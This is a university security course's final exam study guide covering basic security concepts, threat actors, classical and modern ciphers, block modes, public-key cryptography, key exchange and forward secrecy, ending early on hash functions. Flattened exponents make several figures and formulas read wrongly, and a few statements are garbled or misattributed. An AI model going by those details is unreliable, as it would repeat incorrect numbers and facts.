Final Exam Study Guide

The three-hour study guide for the final exam

Paul Krzyzanowski

December 2024

Disclaimer: This study guide attempts to touch upon the most important topics that may be covered on the exam but does not claim to necessarily cover everything that one needs to know for the exam. Finally, don't take the three hour time window in the title literally.

Last update: Wed Apr 23 20:05:48 EDT 2025

Introduction

Computer security is about keeping computers, their programs, and the data they manage “safe.” Specifically, this means safeguarding three areas: confidentiality, integrity, and availability. These three are known as the CIA Triad (no relation to the Central Intelligence Agency).

Confidentiality
Confidentiality ensures that information is protected from unauthorized access, allowing only authorized users to view or modify it. Privacy gives individuals control over their personal data, focusing on how it is collected and shared. Privacy is a reason for confidentiality. Someone being able to access a protected file containing your medical records without proper access rights is a violation of confidentiality. Anonymity hides a person’s identity, even if their actions are visible. Secrecy involves the deliberate concealment of information for security or strategic reasons.
A data breach occurs when unauthorized individuals access sensitive data due to hacking, malware, or poor security controls. This can expose personal, financial, or corporate information, leading to identity theft or financial loss. Data exfiltration is the unauthorized transfer of stolen data from a system, often as part of a breach. Attackers use malware, phishing, or compromised credentials to extract information for fraud or sale.
Integrity

Integrity refers to the trustworthiness of a system. This means that everything is as you expect it to be: users are not imposters and processes are running correctly.

  • Data integrity means that the data in a system has not been corrupted.

  • Origin integrity means that the person or system sending a message or creating a file truly is that person and not an imposter. Authentication techniques can address this issue.

  • Recipient integrity means that the person or system receiving a message truly is that person and not an imposter.

  • System integrity means that the entire computing system is working properly; that it has not been damaged or subverted. Processes are running the way they are supposed to.

Maintaining integrity means not just defending against intruders that want to modify a program or masquerade as others but also protecting the system against against accidental damage, such as from user or programmer errors.
Availability
Availability means that the system is available for use and performs properly. A denial of service (DoS) attack may not steal data or damage any files but may cause a system to become unresponsive.

Security is difficult. Software is incredibly complex. Large systems may comprise tens or hundreds of millions of lines of code. Systems as a whole are also complex. We may have a mix of cloud and local resources, third-party libraries, and multiple administrators. If security was easy, we would not have massive security breaches year after year. Microsoft wouldn’t have monthly security updates. There are no magic solutions … but there is a lot that can be done to mitigate the risk of attacks and their resultant damage.

We saw that computer security addressed three areas of concern. The design of security systems also has three goals.

Prevention
Prevention means preventing attackers from violating established security policies. It means that we can implement mechanisms into our hardware, operating systems, and application software that users cannot override – either maliciously or accidentally. Examples of prevention include enforcing access control rules for files and authenticating users with passwords.
Detection
Detection detects and reports security attacks. It is particularly important when prevention mechanisms fail. It is useful because it can identify weaknesses with certain prevention mechanisms. Even if prevention mechanisms are successful, detection mechanisms are useful to let you know that attempted attacks are taking place. An example of detection is notifying an administrator that a new user has been added to the system. Another example is being notified that there have been several consecutive unsuccessful attempts to log in.
Recovery
If a system is compromised, we need to stop the attack and repair any damage to ensure that the system can continue to run correctly and the integrity of data is preserved. Recovery includes forensics, the study of identifying what happened and what was damaged so we can fix it. An example of recovery is restoration from backups.

Security engineering involves implementing mechanisms and defining policies to protect a system’s components. Like other engineering disciplines, it requires trade-offs between security and usability. The most secure system would be completely isolated, housed in a shielded room with restricted access, and running fully audited software—but such a setup is impractical for everyday computing. Users need connectivity, mobility, and interaction with the world, which introduces risks. Even in a highly secure environment, concerns remain: monitoring access, verifying software integrity, and preventing insider threats or coercion. Effective security design requires understanding potential attackers and their threats, balancing protection with functionality.

Risk analysis evaluates the likelihood and impact of an attack, identifying who may be affected and the worst possible consequences. A threat model visually maps data flows, highlighting points where information enters, exits, or moves between subsystems. This helps prioritize security efforts by identifying the most vulnerable areas in a system.

Secure systems consist of policies and mechanisms working together to enforce security. A policy defines what is or isn’t allowed, such as requiring users to log in with a password. Mechanisms are the technical implementations that enforce these policies. For example, a login system that prompts for credentials, verifies them against stored records, and grants access only if authentication succeeds ensures that the policy is followed. Effective security requires both well-defined policies and robust mechanisms to enforce them.

Key Cybersecurity Concepts

Understanding how attacks occur requires familiarity with key terms that describe weaknesses, threats, and attack methods. The following definitions explain fundamental concepts related to system security and cyber threats.

Vulnerability

A vulnerability is a weakness in a system, software, or network that can be exploited by an attacker. Vulnerabilities can arise from software bugs, misconfigurations, or weak security practices.

Example: An outdated web server with an unpatched security flaw that allows unauthorized access.

Exploit

An exploit is a technique, tool, or piece of code designed to take advantage of a vulnerability. Exploits can be automated scripts, malware, or sophisticated attack methods used to gain unauthorized access or control over a system.

Example: A hacker uses a known buffer overflow exploit to crash a system and execute malicious code.

Attack

An attack is a deliberate attempt to compromise a system’s security, often with the goal of stealing data, disrupting services, or gaining unauthorized control. Attacks can be carried out manually by skilled hackers or through automated tools.

Example: A phishing attack that tricks users into revealing their login credentials.

Attack Vector

An attack vector is the method or pathway an attacker uses to deliver an exploit and gain access to a system. Attack vectors can be technical (such as software vulnerabilities) or social (such as phishing).

Example: A malicious email attachment that installs malware when opened.

Attack Surface

An attack surface represents the total number of possible entry points that an attacker can target. A larger attack surface increases the risk of security breaches, as more vulnerabilities may be exposed.

Example: A company’s attack surface includes its public website, employee email accounts, remote access systems, and IoT devices.

Threat

A threat is any potential danger that could exploit a vulnerability to cause harm. Threats can originate from malicious actors, software bugs, or natural disasters that disrupt security.

Example: A ransomware threat that encrypts critical files and demands payment for their release.

Threat Actor

A threat actor is the entity responsible for carrying out an attack. Threat actors include hackers, cybercriminal groups, nation-state attackers, and even insiders with malicious intent.

Example: The Lazarus Group, a North Korean cyber-espionage team responsible for various high-profile attacks.

Threat categories

Threats fall into four broad categories:

Disclosure: Unauthorized access to data, which covers exposure, interception, interference, and intrusion. This includes stealing data, improperly making data available to others, or snooping on the flow of data.

Deception: Accepting false data as true. This includes masquerading, which is posing as an authorized entity; substitution or insertion of includes the injection of false data or modification of existing data; repudiation, where someone falsely denies receiving or originating data.

Disruption: Some change that interrupts or prevents the correct operation of the system. This can include maliciously changing the logic of a program, a human error that disables a system, an electrical outage, or a failure in the system due to a bug. It can also refer to any obstruction that hinders the functioning of the system.

Usurpation: Unauthorized control of some part of a system. This includes theft of service as well as any misuse of the system such as tampering or actions that result in the violation of system privileges.

Network threats

The Internet increases opportunities for attackers. The core protocols of the Internet were designed with decentralization, openness, and interoperability in mind rather than security. Anyone can join the Internet and send messages … and untrustworthy entities can provide routing services. It allows bad actors to hide and to attack from a distance. It also allows attackers to amass asymmetric force: harnessing more resources to attack than the victim has for defense. Even small groups of attackers are capable of mounting Distributed Denial of Service (DDoS) attacks that can overwhelm large companies or government agencies by assembling a botnet of tens or hundreds of thousands of compromised computers.

Threat actors

Adversaries can range from lone hackers to industrial spies, terrorists, and intelligence agencies. We can consider two dimensions: skill and focus.

Regarding focus, attacks are either opportunistic or targeted.

Opportunistic attacks are those where the attacker is not out to get you specifically but casts a wide net, trying many systems in the hope of finding a few that have a particular vulnerability that can be exploited. Targeted attacks are those where the attacker targets you specifically.

In the dimension of skill, the term script kiddies is used to refer to attackers who lack the skills to craft their own exploits but download malware toolkits to try to find vulnerabilities (e.g., systems with poor or default passwords, hackable cameras). They can still cause substantial damage.

Advanced persistent threats (APT) are highly-skilled, well-funded, and determined (hence, persistent) attackers. They can craft their own exploits, pay millions of dollars for others, and may carry out complex, multi-stage attacks.

Trusted computing base

The Trusted Computing Base (TCB) consists of the hardware, software, and firmware that enforce a system’s security policies. If the TCB is compromised, you lose assurance that any part of the system remains secure. For example, if an attacker modifies the operating system to ignore file access permissions, applications running on the system can no longer be trusted to enforce security rules. A compromised TCB can allow unauthorized access, privilege escalation, or persistent backdoors, making security controls ineffective.

The computing supply chain is crucial to TCB security, as modern systems rely on globally sourced and third-party components – both hardware and software. A compromised supply chain—whether through malicious firmware, counterfeit hardware, or backdoored software—can introduce vulnerabilities before a system is even deployed. Examples include the SolarWinds breach and hardware-level implants, which demonstrated how attackers can infiltrate systems at a fundamental level. If an attacker compromises the supply chain, even secure software running on top of the system cannot be trusted. To prevent such risks, organizations implement secure sourcing, vendor audits, firmware integrity checks, and hardware attestation to ensure the trustworthiness of the computing infrastructure.

Cryptography

Cryptography deals with encrypting plaintext using a cipher, also known as an encryption algorithm, to create ciphertext, which is unintelligible to anyone unless they can decrypt the ciphertext. It is a tool that helps build protocols that address:

Authentication
Showing that the user really is that user.
Integrity:
Validating that the message has not been modified.
Nonrepudiation:
Binding the origin of a message to a user so that she cannot deny creating it.
Confidentiality:
Hiding the contents of a message.

A secret cipher is one where the workings of the cipher must be kept secret. There is no reliance on any key and the secrecy of the cipher is crucial to the value of the algorithm. This has obvious flaws: people in the know leaking the secret, designers coming up with a poor algorithm, and reverse engineering. Schneier’s Law (not a real law), named after Bruce Schneier, a cryptographer and security professional, suggests that anyone can invent a cipher that they will not be able to break, but that doesn’t mean it’s a good one.

For any serious use of encryption, we use well-tested, non-secret algorithms that rely on secret keys. A key is a parameter to a cipher that alters the resulting ciphertext. Knowledge of the key is needed to decrypt the ciphertext. Kerckhoffs’s Principle states that a cryptosystem should be secure even if everything about the system, except the key, is public knowledge. We expect algorithms to be publicly known and all security to rest entirely on the secrecy of the key.

A symmetric encryption algorithm uses the same secret key for encryption and decryption.

An alternative to symmetric ciphers are asymmetric ciphers. An asymmetric, or public key cipher uses two related keys. Data encrypted with one key can only be decrypted with the other key.

Properties of good ciphers

These are the key properties we expect for a cipher to be strong:

  1. For a cipher to be considered good, ciphertext should be indistinguishable from random values.
  2. Given ciphertext, there should be no way to extract the original plaintext or the key that was used to create it except by of enumerating over all possible keys. This is called a brute-force attack.
  3. The keys used for encryption should be large enough that a brute force attack is not feasible. Each additional bit in a key doubles the number of possible keys and hence doubles the search time.

Stating that the ciphertext should be indistinguishable from random values implies high entropy. Shannon entropy measures the randomness in a system. It quantifies the unpredictability of cryptographic keys and messages, with higher entropy indicating more randomness. Low entropy would allow an attacker to find patterns or some correlation to the original content.

We expect these properties for a cipher to be useful:

  1. The secrecy of the cipher should be entirely in the key (Kerckoffs’s principle) – we expect knowledge of the algorithm to be public.

  2. Encryption and decryption should be efficient: we want to encourage the use of secure cryptography where it is needed and not have people avoid it because it slows down data access.

  3. Keys and algorithms should be as simple as possible and operate on any data:

    • There shouldn’t be restrictions on the values of keys, the data that could be encrypted, or how to do the encryption
    • Restrictions on keys make searches easier and will require longer keys.
    • Complex algorithms will increase the likelihood of implementation errors.
    • Restrictions on what can be encrypted will encourage people to not use the algorithm.
  4. The size of the ciphertext should be the same size as the plaintext.

    • You don’t want your effective bandwidth cut in half because the ciphertext is 2x the size of plaintext.
    • However, sometimes we might need to pad the data but that’s a small number of bytes regardless of the input size.
  5. The algorithm has been extensively analyzed

    • We don’t want the latest – we want an algorithm that has been studied carefully for years by many experts.

In addition to formulating the measurement of entropy, Claude Shannon posited that a strong cipher should, ideally, have the confusion and diffusion as goals in its operation.

Confusion means that there is no direct correlation between a bit of the key and the resulting ciphertext. Every bit of ciphertext will be impacted by multiple bits of the key. An attacker will not be able to find a connection between a bit of the key and a bit of the ciphertext. This is important in not giving the cryptanalyst hints on what certain bits of the key might be and thus limit the set of possible keys. Confusion hides the relationship between the key and ciphertext

Diffusion is the property where the plaintext information is spread throughout the cipher so that a change in one bit of plaintext will change, on average, half of the bits in the ciphertext. Diffusion tries to make the relationship between the plaintext and ciphertext as complicated as possible.

Classic cryptography

Monoalphabetic substitution ciphers

The earliest form of cryptography was the monoalphabetic substitution cipher. In this cipher, each character of plaintext is substituted with a character of ciphertext based on a substitution alphabet (a lookup table). The simplest of these is the Caesar cipher, known as a shift cipher, in which a plaintext character is replaced with a character that is n positions away in the alphabet. The key is the simply the the shift value: the number n. Substitution ciphers are vulnerable to frequency analysis attacks, in which an analyst analyzes letter frequencies in ciphertext and substitutes characters with those that occur with the same frequency in natural language text (e.g., if “x” occurs 12% of the time, it’s likely to really be an “e” since “e” occurs in English text approximately 12% of the time while “x” occurs only 0.1% of the time).

Polyalphabetic substitution ciphers

Polyalphabetic substitution ciphers were designed to increase resiliency against frequency analysis attacks. Instead of using a single plaintext to ciphertext mapping for the entire message, the substitution alphabet may change periodically. Leon Battista Alberti is credited with creating the first polyalphabetic substitution cipher. In the Alberti cipher (essentially a secret decoder ring), the substitution alphabet changes every n characters as the ring is rotated one position every n characters.

The Vigenère cipher is a grid of Caesar ciphers that uses a repeating key. A repeating key is a key that repeats itself for as long as the message. Each character of the key determines which Caesar cipher (which row of the grid) will be used for the next character of plaintext. The position of the plaintext character identifies the column of the grid. These algorithms are still vulnerable to frequency analysis attacks but require substantially more plaintext since one needs to deduce the key length (or the frequency at which the substitution alphabet changes) and then effectively decode multiple monoalphabetic substitution ciphers.

One-time Pads

The one-time pad is the only provably secure cipher. It uses a random key that is as long as the plaintext. Each character of plaintext is permuted by a character of ciphertext (e.g., add the characters modulo the size of the alphabet or, in the case of binary data, exclusive-or the next byte of the text with the next byte of the key). The reason this cryptosystem is not particularly useful is because the key has to be as long as the message, so transporting the key securely becomes a problem. The challenge of sending a message securely is now replaced with the challenge of sending the key securely. The position in the key (pad) must by synchronized at all times. Error recovery from unsynchronized keys is not possible. Finally, for the cipher to be secure, a key must be composed of truly random characters, not ones derived by an algorithmic pseudorandom number generator. The key can never be reused.

The one-time pad provides perfect secrecy (not to be confused with forward secrecy, also called perfect forward secrecy, which will be discussed later), which means that the ciphertext conveys no information about the content of the plaintext. It has been proved that perfect secrecy can be achieved only if there are as many possible keys as the plaintext, meaning the key has to be as long as the message. Watch this video for an explanation of perfect secrecy.

Stream ciphers

A stream cipher simulates a one-time pad by using a keystream generator to create a set of key bytes that is as long as the message. A keystream generator is a pseudorandom number generator that is seeded, or initialized, with a key that drives the output of all the bytes that the generator spits out. The keystream generator is fully deterministic: the same key will produce the same stream of output bytes each time. Because of this, receivers only need to have the key to be able to decipher a message. However, because the keystream generator does not generate true random numbers, the stream cipher is not a true substitute for a one-time pad. Its strength rests on the strength of the key. A keystream generator will, at some point, will reach an internal state that is identical to some previous internal state and produce output that is a repetition of previous output. This also limits the security of a stream cipher but the repetition may not occur for a long time, so stream ciphers can still be useful for many purposes.

Rotor machines

A rotor machine is an electromechanical device that implements a polyalphabetic substitution cipher. It uses a set of disks (rotors), each of which implements a substitution cipher. The rotors rotate with each character in the style of an odometer: after a complete rotation of one rotor, the next rotor advances one position. Each successive character gets a new substitution alphabet applied to it. The multi-rotor mechanism allows for a huge number of substitution alphabets to be employed before they start repeating when the rotors all reach their starting position. The number of alphabets is cr, where c is the number of characters in the alphabet and r is the number of rotors.

Transposition ciphers

Instead of substituting one character of plaintext for a character of ciphertext, a transposition cipher scrambles the position of the plaintext characters. Decryption is the knowledge of how to unscramble them.

A scytale, also known as a staff cipher, is an ancient implementation of a transposition cipher where text written along a strip of paper is wrapped around a rod and the resulting sequences of text are read horizontally. This is equivalent to entering characters in a two-dimensional matrix horizontally and reading them vertically. Because the number of characters might not be a multiple of the width of the matrix, extra characters might need to be added at the end. This is called padding and is essential for block ciphers, which encrypt chunks of data at a time.

Block ciphers

Most modern ciphers are block ciphers, meaning that they encrypt a chunk of bits, or block, of plaintext at a time. The same key is used to encrypt each successive block of plaintext.

AES and DES are two popular symmetric block ciphers. Symmetric block ciphers are usually implemented as iterative ciphers. The encryption of each block of plaintext iterates over several rounds. Each round uses a subkey, which is a key generated from the main key via a specific set of bit replications, inversions, and transpositions. The subkey is also known as a round key since it is applied to only one round, or iteration. This subkey determines what happens to the block of plaintext as it goes through a substitution-permutation (SP) network. The SP network, guided by the subkey, flips some bits by doing a substitution, which is a table lookup of an input bit pattern to get an output bit pattern and a permutation, which is a scrambling of bits in a specific order. The output bytes are fed into the next round, which applies a substitution-permutation step onto a different subkey. The process continues for several rounds (16 rounds for DES, 10–14 rounds for AES). and the resulting bytes are the ciphertext for the input block.

The iteration through multiple SP steps creates confusion and diffusion. Confusion means that it is extremely difficult to find any correlation between a bit of the ciphertext with any part of the key or the plaintext. A core component of block ciphers is the s-box, which converts n input bits to m output bits, usually via a table lookup. The purpose of the s-box is to add confusion by altering the relationship between the input and output bits.

Diffusion means that any changes to the plaintext are distributed (diffused) throughout the ciphertext so that, on average, half of the bits of the ciphertext would change if even one bit of plaintext is changed.

Feistel ciphers

A Feistel cipher is a form of block cipher that uses a variation of the SP network where a block plaintext is split into two parts. The substitution-permutation round is applied to only one part. That output is then XORed with the other part and the two halves are swapped. At each round, half of the input block remains unchanged. DES, the Data Encryption Standard, is an example of a Feistel cipher. AES, the Advanced Encryption Standard, is not.

DES

Two popular symmetric block ciphers are DES, the Data Encryption Standard, and AES, the Advanced Encryption Standard. DES was adopted as a federal standard in 1976 and is a block cipher based on the Feistel cipher that encrypts 64-bit blocks using a 56-bit key.

DES has been shown to have some minor weaknesses against cryptanalysis. Key can be recovered using 247 chosen plaintexts or 243 known plaintexts. Note that this is not a practical amount of data to get for a real attack. The real weakness of DES is not the algorithm but but its 56-bit key. An exhaustive search requires 255 iterations on average (we assume that, on average, the plaintext is recovered halfway through the search). This was a lot for computers in the 1970s but is not much of a challenge for today’s dedicated hardware or distributed efforts.

Triple-DES

Triple-DES (3DES) solves the key size problem of DES and allows DES to use keys up to 168 bits. It does this by applying three layers of encryption:

  1. C' = Encrypt M with key K1
  2. C'' = Decrypt C' with key K2
  3. C = Encrypt C'' with key K3

If K1, K2, and K3 are identical, we have the original DES algorithm since the decryption in the second step cancels out the encryption in the first step. If K1 and K3 are the same, we effectively have a 112-bit key and if all three keys are different, we have a 168-bit key.

Cryptanalysis is not effective with 3DES: the three layers of encryption use 48 rounds instead of 16 making it infeasible to reconstruct the substitutions and permutations that take place. A 168-bit key is too long for a brute-force attack. However, DES is relatively slow compared with other symmetric ciphers, such as AES. It was designed with hardware encryption in mind. 3DES is, of course, three times slower than DES.

AES

AES, the Advanced Encryption Standard, was designed as a successor to DES and became a federal government standard in 2002. It uses a larger block size than DES: 128 bits versus DES’s 64 bits and supports larger key sizes: 128, 192, and 256 bits. Even 128 bits is complex enough to prevent brute-force searches.

No significant academic attacks have been found thus far beyond brute force search. AES is also typically 5–10 times faster in software than 3DES.

Block cipher modes

Electronic Code Book (ECB)

When data is encrypted with a block cipher, it is broken into blocks and each block is encrypted separately. This leads to two problems.

  1. If different encrypted messages contain the same substrings and use the same key, an intruder can deduce that it is the same data.

  2. Secondly, a malicious party can delete, add, or replace blocks (perhaps with blocks that were captured from previous messages).

This basic form of a block cipher is called an electronic code book (ECB). Think of the code book as a database of encrypted content. You can look up a block of plaintext and find the corresponding ciphertext. This is not feasible to implement for arbitrary messages but refers to the historic use of codebooks to convert plaintext messages to ciphertext.

Cipher Block Chaining (CBC)

Cipher block chaining (CBC) addresses these problems. Every block of data is still encrypted with the same key. However, prior to being encrypted, the data block is exclusive-ORed with the previous block of ciphertext. The receiver does the process in reverse: a block of received data is decrypted and then exclusive-ored with the previously-received block of ciphertext to obtain the original data. The very first block is exclusive-ored with a random initialization vector, which must be transmitted to the remote side.

Note that CBC does not make the encryption more secure; it simply makes the result of each block of data dependent on all previous previous blocks. Because of the random initialization vector, even identical content would appear different in ciphertext. An attacker would not be able to tell if any two blocks of ciphertext refer to identical blocks of plaintext. Because of the chaining, even identical blocks in the same ciphertext will appear vastly different. Moreover, because of this blocks cannot be meaningfully inserted, swapped, or deleted in the message stream without the decryption failing (producing random-looking garbage).

Counter mode (CTR)

Counter mode (CTR) also addresses these problems but in a different way. The ciphertext of each block is a function of its position in the message. Encryption starts with a message counter. The counter is incremented for each block of input. Only the counter is encrypted. The resulting ciphertext is then exclusive-ORed with the corresponding block of plaintext, producing a block of message ciphertext. To decrypt, the receiver does the same thing and needs to know the starting value of the counter as well as the key.

An advantage of CTR mode is that each block has no dependance on other blocks and encryption on multiple blocks can be done in parallel.

Cryptanalysis

The goal of cryptanalysis is break codes. Most often, it is to identify some non-random behavior of an algorithm that will give the analyst an advantage over an exhaustive search of the key space.

Differential cryptanalysis seeks to identify non-random behavior by examining how changes in plaintext input affect changes in the output ciphertext. It tries to find whether certain bit patterns are unlikely for certain keys or whether the change in plaintext results in likely changes in the output.

Linear cryptanalysis tries to create equations that attempt to predict the relationships between ciphertext, plaintext, and the key. An equation will never be equivalent to a cipher but any correlation of bit patterns give the analyst an advantage.

Neither of these methods will break a code directly but may help find keys or data that are more likely are that are unlikely. It reduces the keys that need to be searched.

Public key cryptography

Public key algorithm, also known as asymmetric ciphers, use one key for encryption and another key for decryption. One of these keys is kept private (known only to the creator) and is known as the private key. The corresponding key is generally made visible to others and is known as the public key.

Anything encrypted with the private key can only be decrypted with the public key. This is the basis for digital signatures. Anything that is encrypted with a public key can be encrypted only with the corresponding private key. This is the basis for authentication and covert communication.

Public and private keys are related but, given one of the keys, there is no feasible way of computing the other. They are based on trapdoor functions, which are one-way functions: there is no known way to compute the inverse unless you have extra data: the other key.

RSA public key cryptography

The RSA algorithm is the most popular algorithm for asymmetric cryptography. Its security is based on the difficulty of finding the factors of the product of two large prime numbers. Unlike symmetric ciphers, RSA encryption is a matter of performing arithmetic on large numbers. It is also a block cipher and plaintext is converted to ciphertext by the formula:

c = me mod n

Where m is a block of plaintext, e is the encryption key, and n is an agreed-upon modulus that is the product of two primes. To decrypt the ciphertext, you need the decryption key, d:

m = cd mod n

Given the ciphertext c, e, and n, there is no efficient way to compute the inverse to obtain m. Should an attacker find a way to factor n into its two prime factors, however, the attacker would be able to reconstruct the encryption and decryption keys, e and d.

Elliptic curve cryptography (ECC)

Elliptic curve cryptography (ECC) is a more recent public key algorithm that is an alternative to RSA. It is based on finding points along a prescribed elliptic curve, which is an equation of the form:

y2 = x3 + ax + b

Contrary to its name, elliptic curves have nothing to do with ellipses or conic sections and look like bumpy lines. With elliptic curves, multiplying a point on a given elliptic curve by a number will produce another point on the curve. However, given that result, it is difficult to find what number was used. The security in ECC rests not our inability to factor numbers but our inability to perform discrete logarithms in a finite field.

The RSA algorithm is still the most widely used public key algorithm, but ECC has some advantages:

  • ECC can use far shorter keys for the same degree of security. Security comparable to 256 bit AES encryption requires a 512-bit ECC key but a 15,360-bit RSA key

  • ECC requires less CPU consumption and uses less memory than RSA. It is faster for encryption (including signature generation) than RSA but slower for decryption.

  • Generating ECC keys is faster than RSA (but much slower than AES, where a key is just a random number).

On the downside, ECC is more complex to implement and decryption is slower than with RSA. As a standard, ECC was also tainted because the NSA inserted weaknesses into the ECC random number generator that effectively created a backdoor for decrypting content. This has been remedied and ECC is generally considered the preferred choice over RSA for most applications.

If you are interested, see here for a somewhat easy-to-understand tutorial on ECC.

Quantum computing

Quantum computers are a markedly different form computer. Conventional computers store and process information that is represented in bits, with each bit having a distinct value of 0 or 1. Quantum computers use the principles of quantum mechanics, which include superposition and entanglement. Instead of working with bits, quantum computers operate on qubits, which can hold values of “0” and “1” simultaneously via superposiion. The superpositions of qubits can be entangled with other objects so that their final outcomes will be mathematically related. A single operation can be carried out on 2n values simultaneously, where n is the number of qubits in the computer.

While practical quantum computers don’t exist, it’s predicted that certain problems may be solved exponentially faster than with conventional computers. Shor’s algorithm, for instance, will be able to find the prime factors of large integers and compute discrete logarithms far more efficiently than is currently possible.

So far, quantum computers are very much in their infancy, and it is not clear when – or if – large-scale quantum computers that are capable of solving useful problems will be built. It is unlikely that they will be built in the next several years but we expect that they will be built eventually. Shor’s algorithm will be able to crack public-key based systems such as RSA, Elliptic Curve Cryptography, and Diffie-Hellman key exchange. In 2016, the NSA called for a migration to “post-quantum cryptographic algorithms” and has currently narrowed down the submissions to 26 candidates. The goal is to find useful trapdoor functions that do not rely on multiplying large primes, computing exponents, any other mechanisms that can be attacked by quantum computation. If you are interested in these, you can read the NSA’s report.

Symmetric cryptosystems, such as AES, are not particularly vulnerable to quantum computing since they rely on moving and flipping bits rather than applying mathematical functions on the data. The best potential attacks come via Grover’s algorithm, which yields only a quadratic rather than an exponential speedup in key searches. This will reduce the effective strength of a key by a factor of two. For instance, a 128-bit key will have the strength of a 64-bit key on a conventional computer. It is easy enough to use a sufficiently long key (256-bit AES keys are currently recommended) so that quantum computing poses no threat to symmetric algorithms.

Secure communication

Symmetric cryptography

Communicating securely with symmetric cryptography is easy. All communicating parties must share the same secret key. Plaintext is encrypted with the secret key to create ciphertext and then transmitted or stored. It can be decrypted by anyone who has the secret key.

Asymmetric cryptography

Communicating securely with asymmetric cryptography is a bit different. Anything encrypted with one key can be decrypted only by the other related key. For Alice to encrypt a message for Bob, she encrypts it with Bob’s public key. Only Bob has the corresponding key that can decrypt the message: Bob’s private key.

Hybrid cryptography

Asymmetric cryptography alleviates the problem of transmitting a key over an unsecure channel. However, it is considerably slower than symmetric cryptography. AES, for example, is approximately 1,500 times faster for decryption than RSA and 40 times faster for encryption. AES is also much faster than ECC. Key generation is also far slower with RSA or ECC than it is with symmetric algorithms, where the key is just a random number rather than a set of carefully chosen numbers with specific properties. Moreover, certain keys with RSA may be weaker than others.

Because of these factors, RSA and ECC are never used to encrypt large chunks of information. Instead, it is common to use hybrid cryptography, where a public key algorithm is used to encrypt a randomly-generated key that will encrypt the message with a symmetric algorithm. This randomly-generated key is called a session key, since it is generally used for one communication session and then discarded.

Key Exchange

The biggest problem with symmetric cryptography is key distribution. For Alice and Bob to communicate, they must share a secret key that no adversaries can get. However, Alice cannot send the key to Bob since it would be visible to adversaries. She cannot encrypt it because Alice and Bob do not share a key yet.

Diffie-Hellman key exchange

The Diffie-Hellman key exchange algorithm allows two parties to establish a common key without disclosing any information that would allow any other party to compute the same key. Each party generates a private key and a public key. Despite their name, these are not encryption keys; they are just numbers. Diffie-Hellman does not implement public key cryptography. Alice can compute a common key using her private key and Bob’s public key. Bob can compute the same common key by using his private key and Alice’s public key.

Diffie-Hellman uses the one-way function abmod c. Its one-wayness is due to our inability to compute the inverse: a discrete logarithm. Anyone may see Alice and Bob’s public keys but will be unable to compute their common key. Although Diffie-Hellman is not a public key encryption algorithm, it behaves like one in the sense that it allows us to exchange keys without having to use a trusted third party.

Key exchange using public key cryptography

With public key cryptography, there generally isn’t a need for key exchange. As long as both sides can get each other’s public keys from a trusted source, they can encrypt messages using those keys. However, we rarely use public key cryptography for large messages. It can, however, be used to transmit a session key. This use of public key cryptography to transmit a session key that will be used to apply symmetric cryptography to messages is called hybrid cryptography. For Alice to send a key to Bob:

  1. Alice generates a random session key.
  2. She encrypts it with Bob’s public key & sends it to Bob.
  3. Bob decrypts the message using his private key and now has the session key.

Bob is the only one who has Bob’s private key to be able to decrypt that message and extract the session key. A problem with this is that anybody can do this. Charles can generate a random session key, encrypt it with Bob’s public key, and send it to Bob. For Bob to be convinced that it came from Alice, she can encrypt it with her private key (this is signing the message).

  1. Alice generates a random session key.
  2. She signs it by encrypting the key with her private key.
  3. She encrypts the result with Bob’s public key & sends it to Bob.
  4. Bob decrypts the message using his private key.
  5. Bob decrypts the resulting message with Alice’s public key and gets the session key.

If anybody other than Alice created the message, the result that Bob gets by decrypting it with Alice’s public key will not result in a valid key for anyone. We can enhance the protocol by using a standalone signature (encrypted hash) so Bob can identify a valid key from a bogus one.

Forward secrecy and key types

If an attacker steals Bob’s private key, they will be able to decrypt old session keys. This is because, at the start of every communication session with Bob, the session key is typically encrypted using Bob’s public key. Once the attacker has Bob’s private key, they can retroactively decrypt these session keys and access past communications.

Forward Secrecy

Forward secrecy, also known as perfect forward secrecy (PFS), ensures that the compromise of a long-term key (e.g., Bob’s private key) does not compromise past session keys. This means there is no secret that, if stolen, allows an attacker to decrypt multiple past messages.

Forward secrecy is valuable for communication sessions but not for stored encrypted documents. In communications, the goal is to prevent an attacker from retroactively decrypting old conversations, even if they later obtain a user’s private key. However, encrypted documents must remain decryptable by the legitimate user, which requires reliance on a long-term key.

Diffie-Hellman and Forward Secrecy

Diffie-Hellman key exchange enables forward secrecy by allowing Alice and Bob to generate temporary (ephemeral) key pairs for each session. The process works as follows:

  1. Alice and Bob each generate a new public-private key pair and exchange their public keys.
  2. Using their own private key and the received public key, they compute a shared secret.
  3. This shared secret is used to encrypt their communication for that session.
  4. For the next session, they generate new key pairs and derive a new shared secret.

Since a new set of keys is used for every session, even if an attacker later compromises Bob’s private key, they cannot decrypt past messages because those sessions used different keys.

In contrast, encrypting a session key with a long-term key (such as Bob’s public key in an RSA-based system) does not provide forward secrecy. If an attacker gains access to Bob’s private key, they can decrypt all past session keys and decrypt old communications.

Types of Cryptographic Keys

Long-Term Keys
These keys persist across multiple sessions and are used for authentication, identity verification, and encrypting stored data. Examples include RSA or ECC private keys used to create digital signatures and digital certificates.
  • Ephemeral Keys: These are temporary, single-use keys generated for a session and discarded afterward. Diffie-Hellman and Elliptic Curve Diffie-Hellman are examples used to achieve forward secrecy.
  • Session Keys: These are symmetric encryption keys used for a single communication session. They are often derived from ephemeral key exchanges and are used to encrypt messages between parties for the duration of the session.

Ephemeral keys are discarded as soon as a session key is established. Session keys can be discarded when the communication session ends.

Diffie-Hellman is particularly useful for achieving forward secrecy because it allows efficient on-the-fly key pair generation. While RSA or ECC keys could theoretically be used for ephemeral key exchange, key generation for RSA and ECC is computationally expensive. As a result, RSA and ECC keys are typically used as long-term keys (e.g., for authentication and digital signatures) rather than for generating new session keys dynamically.

Message Integrity

One-way and Trapdoor Functions

A one-way function is easy to compute but infeasible to invert. Given an output, finding the original input is computationally impractical. These functions are the foundation of cryptographic hash functions (e.g., SHA-256), which ensure data integrity, password security, and digital signatures.

A trapdoor function is a one-way function with a secret trapdoor that allows efficient inversion. These functions are fundamental to public-key cryptography, including Diffie-Hellman, RSA, and ECC, enabling secure encryption, decryption, and digital signatures.

Feature One–Way Function Trapdoor Function
Inversion Impossible Possible with secret trapdoor
Key Use Hash functions Public-key cryptography
Security Role Integrity & authentication Encryption & key exchange

One-way functions secure hash-based applications, while trapdoor functions enable asymmetric encryption.

Hash functions

A particularly important class of one-way functions is the cryptographic hash function. These functions produce a fixed-size output, regardless of the input size, making them invaluable in various applications. In general computing, hash functions are often used to build hash tables, enabling O(1) key lookups.

